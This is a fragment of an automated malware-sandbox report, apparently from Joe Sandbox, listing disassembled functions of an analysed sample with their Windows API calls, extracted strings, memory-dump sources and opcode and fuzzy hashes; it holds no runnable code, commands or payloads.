              • Opcode ID: 3059b2276b28165e8fa17518cbafabc9888c5777a9b2a51cacfffc7d6f6bb4c9
              • Instruction ID: 9c83b3aabd512d5d4d6b04463b315f8e13af656235e9111f458c93708a94a1ee
              • Opcode Fuzzy Hash: 3059b2276b28165e8fa17518cbafabc9888c5777a9b2a51cacfffc7d6f6bb4c9
              • Instruction Fuzzy Hash: AA41BE31248385AAE739DF64DC56BEABBE8FF85700F04091DB5D0D32C1D6A49A889B53
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008289AD,?,00000000,?,00000001,?,?,00000001,008289AD,?), ref: 0082C0E6
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0082C16F
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008267E2,?), ref: 0082C181
              • __freea.LIBCMT ref: 0082C18A
                • Part of subcall function 00828518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: 5d0847129dd29c4a68a9a3fb62eed2b1b252b4938ee8de097cfac83960ee779f
              • Instruction ID: af8033d66b0bcb25304dc1d649791acb5f1d18898762567ece211d806fc80cf9
              • Opcode Fuzzy Hash: 5d0847129dd29c4a68a9a3fb62eed2b1b252b4938ee8de097cfac83960ee779f
              • Instruction Fuzzy Hash: 03319D72A0022AABDF258F69EC46DBE7BA5FB44710F150628FC05D6251E735CDA0CBA1
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 0082251A
                • Part of subcall function 00822B52: ___AdjustPointer.LIBCMT ref: 00822B9C
              • _UnwindNestedFrames.LIBCMT ref: 00822531
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00822543
              • CallCatchBlock.LIBVCRUNTIME ref: 00822567
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction ID: 9470cccc5f9bb354b3052b101ebfe2ac81733ad1360401968b8b550ec19ceba6
              • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction Fuzzy Hash: B5012932000118BBCF129F59ED01EDA3BBAFF58714F058115FD18A6121C376E9B1EBA1
              APIs
              • GetDC.USER32(00000000), ref: 00819DBE
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00819DCD
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00819DDB
              • ReleaseDC.USER32(00000000,00000000), ref: 00819DE9
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              • Opcode ID: 0c17eafc7ae71739c243a1934cff04a25cd01b410e7fadac57c3f5230d38a6f8
              • Instruction ID: cd3f632813b9bbb070643d405473813c628442fc6de8004a5c7a3f5cfae22251
              • Opcode Fuzzy Hash: 0c17eafc7ae71739c243a1934cff04a25cd01b410e7fadac57c3f5230d38a6f8
              • Instruction Fuzzy Hash: 2AE0EC35985E21A7D3211BA9BD0DB8F3B54BB0A762F061095FA05A6190DAB04445CB96
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00822016
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0082201B
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00822020
                • Part of subcall function 0082310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0082311F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00822035
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction ID: 61da225cf5bb8bfd2dcde69902100f5dcf7e664670b235292e9d116d25136469
              • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction Fuzzy Hash: 80C04C24004A74F41C213ABE31225BD2740FD62BC4B9225C3FD80D7143DE0E07EAA077
              APIs
                • Part of subcall function 00819DF1: GetDC.USER32(00000000), ref: 00819DF5
                • Part of subcall function 00819DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00819E00
                • Part of subcall function 00819DF1: ReleaseDC.USER32(00000000,00000000), ref: 00819E0B
              • GetObjectW.GDI32(?,00000018,?), ref: 00819F8D
                • Part of subcall function 0081A1E5: GetDC.USER32(00000000), ref: 0081A1EE
                • Part of subcall function 0081A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0081A21D
                • Part of subcall function 0081A1E5: ReleaseDC.USER32(00000000,?), ref: 0081A2B5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              • API String ID: 1061551593-3887548279
              • Opcode ID: 8010e9330c12fa76e877a77efe50e22e486c8d6d2e82751989756ebb9849aaa4
              • Instruction ID: cff8d0eedbab37d23863a486f72801c4689ee05a2dc356ea7938d07f5869eb4f
              • Opcode Fuzzy Hash: 8010e9330c12fa76e877a77efe50e22e486c8d6d2e82751989756ebb9849aaa4
              • Instruction Fuzzy Hash: 50811171208614AFC714DF68C844A6BBBE9FFC8705F00491DF98AD7260DB79AE45CB62
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              • API String ID: 589789837-2259941744
              • Opcode ID: a3211f2289fb61eaad54986b8e68ef1312cab184ead46a6d7ff5962181fca811
              • Instruction ID: e20c41f28736d0900fb0604a4989d1e3344b76b0ec62271d19450133d62192c3
              • Opcode Fuzzy Hash: a3211f2289fb61eaad54986b8e68ef1312cab184ead46a6d7ff5962181fca811
              • Instruction Fuzzy Hash: 3551947158CB08FAEE211AD4DD46FA6765DFF08B04F204906B79AE44D1CAD255D06E13
              APIs
              • _free.LIBCMT ref: 0082AA84
                • Part of subcall function 00828849: IsProcessorFeaturePresent.KERNEL32(00000017,00828838,00000050,00833958,?,0080CFE0,00000004,00840EE8,?,?,00828845,00000000,00000000,00000000,00000000,00000000), ref: 0082884B
                • Part of subcall function 00828849: GetCurrentProcess.KERNEL32(C0000417,00833958,00000050,00840EE8), ref: 0082886D
                • Part of subcall function 00828849: TerminateProcess.KERNEL32(00000000), ref: 00828874
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
              • String ID: *?$.
              • API String ID: 2667617558-3972193922
              • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
              • Instruction ID: 0da6642250c35f03834b4fb2d9faefa6b87310850e0e8c1307fe3f8cefb5c720
              • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
              • Instruction Fuzzy Hash: 8451C371D0012AAFDF18DFA9D881AADBBF5FF48310F258169E855E7301E6319E81CB51
              APIs
              • __EH_prolog.LIBCMT ref: 00807730
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008078CC
                • Part of subcall function 0080A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0080A27A,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A458
                • Part of subcall function 0080A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0080A27A,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A489
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              • API String ID: 1861295151-336475711
              • Opcode ID: 1fba0294308c07c3f510b844d57122c505fcdb3d63a3e7009aa59c6e51a77529
              • Instruction ID: 62adc7e6c875dda0d00d5ce7b5ab3221914c6f356d907af29765c1b93d31f94c
              • Opcode Fuzzy Hash: 1fba0294308c07c3f510b844d57122c505fcdb3d63a3e7009aa59c6e51a77529
              • Instruction Fuzzy Hash: 78417371805258AADB64EB54DD55EEEB37CFF45300F0080AAB649E21D2DB746F84CF62
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              • API String ID: 0-253988292
              • Opcode ID: d750519255c38b78f7324394c5d7dd0f0e5c9fb7d33fda1312afb9cc2ae2fdba
              • Instruction ID: c8561833e3cecac3f96e5770e1aace934bf94d3ca74d9e4dc79c174c75217fa7
              • Opcode Fuzzy Hash: d750519255c38b78f7324394c5d7dd0f0e5c9fb7d33fda1312afb9cc2ae2fdba
              • Instruction Fuzzy Hash: 0E41AF3540021EABCBB0AF25DC41EAB77A9FF85790F108425F824E72D3E770DA40CAA1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              • API String ID: 0-874089819
              • Opcode ID: 107140fbd49926d129d4b0ae345847ce8de7e0798912c4216ee0e59b5a7a3a3f
              • Instruction ID: 740163aadd1d7b10fa28808696e984fd1825e1cd12416f4702ff11589cb3b012
              • Opcode Fuzzy Hash: 107140fbd49926d129d4b0ae345847ce8de7e0798912c4216ee0e59b5a7a3a3f
              • Instruction Fuzzy Hash: 0821A2712043049FCB089F68C8A5AAA77ACFF88711B14856DF849CB282DF74ED80CB61
              APIs
                • Part of subcall function 0080EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0080EB92
                • Part of subcall function 0080EB73: GetProcAddress.KERNEL32(008481C0,CryptUnprotectMemory), ref: 0080EBA2
              • GetCurrentProcessId.KERNEL32(?,?,?,0080EBEC), ref: 0080EC84
              Strings
              • CryptUnprotectMemory failed, xrefs: 0080EC7C
              • CryptProtectMemory failed, xrefs: 0080EC3B
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              • API String ID: 2190909847-396321323
              • Opcode ID: 94a9f79bbf6643f8c6d463143e0f444084400de14a6d313725a1d9dc7913e433
              • Instruction ID: 86829f9784bab28c369085d814c2e7ef89bd60a8648adf6ba7d86835cec7fd58
              • Opcode Fuzzy Hash: 94a9f79bbf6643f8c6d463143e0f444084400de14a6d313725a1d9dc7913e433
              • Instruction Fuzzy Hash: EA115932A11628AFFB155B34DD06A6F3714FF41724B04481AFC05EB2C1CB7A9E4187D5
              APIs
              • CreateThread.KERNEL32(00000000,00010000,008109D0,?,00000000,00000000), ref: 008108AD
              • SetThreadPriority.KERNEL32(?,00000000), ref: 008108F4
                • Part of subcall function 00806E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00806EAF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              • API String ID: 2655393344-3849766595
              • Opcode ID: b269605c8c83d1e9fa1b2957e71a9c5b9c9c3ef371b56bd921541a3ff9b221c3
              • Instruction ID: e1b11b18ca3352278b9de1a23f440de090c0c2011c117b3222ced8b08de42508
              • Opcode Fuzzy Hash: b269605c8c83d1e9fa1b2957e71a9c5b9c9c3ef371b56bd921541a3ff9b221c3
              • Instruction Fuzzy Hash: F201A2B524430A6FD6246F54EC81BA6B39CFF40711F200439FA86D61C1CEF1A8C59A64
              APIs
                • Part of subcall function 0080DA98: _swprintf.LIBCMT ref: 0080DABE
                • Part of subcall function 0080DA98: _strlen.LIBCMT ref: 0080DADF
                • Part of subcall function 0080DA98: SetDlgItemTextW.USER32(?,0083E154,?), ref: 0080DB3F
                • Part of subcall function 0080DA98: GetWindowRect.USER32(?,?), ref: 0080DB79
                • Part of subcall function 0080DA98: GetClientRect.USER32(?,?), ref: 0080DB85
              • GetDlgItem.USER32(00000000,00003021), ref: 0080134F
              • SetWindowTextW.USER32(00000000,008335B4), ref: 00801365
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              • API String ID: 2622349952-4108050209
              • Opcode ID: 7e170fe9bbf497eab56512c710291e33607a4b0b8dccb9d0a02de879d6885bb2
              • Instruction ID: ac4018cf7c05a4e51f564cf1750108ae257015b6ae97b886f383886585704886
              • Opcode Fuzzy Hash: 7e170fe9bbf497eab56512c710291e33607a4b0b8dccb9d0a02de879d6885bb2
              • Instruction Fuzzy Hash: 12F08C7020434CA6DFA60FA48C0DBAE3B98FB11359F0A8054FE49D6AE1C77CC995EA50
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00810A78,?), ref: 00810854
              • GetLastError.KERNEL32(?), ref: 00810860
                • Part of subcall function 00806E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00806EAF
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00810869
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              • API String ID: 1091760877-2248577382
              • Opcode ID: f38792f8c6ea74f3935ff7addb6f6ce3b8e7651e9629a669e7f96506990acc82
              • Instruction ID: 78615802391d395ceeae473e19f9164e0816507917f283554e729a6b403d4b91
              • Opcode Fuzzy Hash: f38792f8c6ea74f3935ff7addb6f6ce3b8e7651e9629a669e7f96506990acc82
              • Instruction Fuzzy Hash: D1D05B3150852166C6142768DC09DAF7905FF91730F700725F639E51F5DE2509A145E6
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,0080D32F,?), ref: 0080DA53
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0080D32F,?), ref: 0080DA61
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              • API String ID: 3537982541-834975271
              • Opcode ID: 16365b311ac65f00f38f187b4c2ce244ec93acd497eea51b25c00c3f9be1916e
              • Instruction ID: ec88795fe6d07e4ff2abcb4def92736dfa51faaec9f3eee093bb8afaab66f8b0
              • Opcode Fuzzy Hash: 16365b311ac65f00f38f187b4c2ce244ec93acd497eea51b25c00c3f9be1916e
              • Instruction Fuzzy Hash: E9C01231385750B6DB341770BD1DB432E88BB51B12F05084CB541DE1D0D5E9C9408690
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dec34dfc2e4385f9c2744d89f170ed19cc7ffaff23f30ad9fe425386711c53c7
              • Instruction ID: 5f3d0c987d4ab071f70dc98768de04100531021a2e603785c4e9e51ef889e6b7
              • Opcode Fuzzy Hash: dec34dfc2e4385f9c2744d89f170ed19cc7ffaff23f30ad9fe425386711c53c7
              • Instruction Fuzzy Hash: 7291AD71E1CA4E8FE784EB2CD8157ADBBE1FB99390F44017AC009D72C6DF6928058B55
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID: NH$p\H
              • API String ID: 0-1232786254
              • Opcode ID: 874f81cecef7c3dcdde953445461355901c76f97c284e5c243958f1badf2d684
              • Instruction ID: 54e4de906a619c1983df18a36e1cffcfc8de56a81ad04dc20646b4bfa8978ddc
              • Opcode Fuzzy Hash: 874f81cecef7c3dcdde953445461355901c76f97c284e5c243958f1badf2d684
              • Instruction Fuzzy Hash: F4E12671D1965ADFEB98EB68D4957B8B7B1FF58340F1400BAD00EE3296CB386880CB55
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd
              Similarity
              • API ID:
              • String ID: 8mH
              • API String ID: 0-1362847371
              • Opcode ID: 0db21c9fcd0c2fb4039125d110850920a44ea4d3b599192350d9f1509d67502e
              • Instruction ID: 7c19d898d6964f6bdc811e72c8e860dea772ae7b0325a531ffbeea95e18cf8a6
              • Opcode Fuzzy Hash: 0db21c9fcd0c2fb4039125d110850920a44ea4d3b599192350d9f1509d67502e
              • Instruction Fuzzy Hash: 35511870D18A5D9FEB94EB68D859BADBBF1FF68740F50006AD00DE7296CF3468818B44
